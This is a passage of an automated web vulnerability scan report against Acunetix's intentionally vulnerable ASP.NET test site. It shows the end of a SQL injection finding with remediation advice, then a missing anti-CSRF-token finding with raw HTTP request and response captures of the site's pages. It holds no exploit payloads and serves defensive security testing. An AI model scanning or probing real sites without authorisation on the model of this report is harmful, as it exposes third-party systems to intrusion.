Solution	Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?' If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do not concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the privilege of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application.
Reference	https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags	OWASP_2021_A03 WSTG-v42-INPV-05 OWASP_2017_A01
CWE Id	89
WASC Id	19
Plugin Id	40027

Medium	Absence of Anti-CSRF Tokens
Description	No Anti-CSRF tokens were found in a HTML submission form. A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf. CSRF attacks are effective in a number of situations, including: * The victim has an active session on the target site. * The victim is authenticated via HTTP auth on the target site. * The victim is on the same local network as the target site. CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="default.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="default.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="about.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
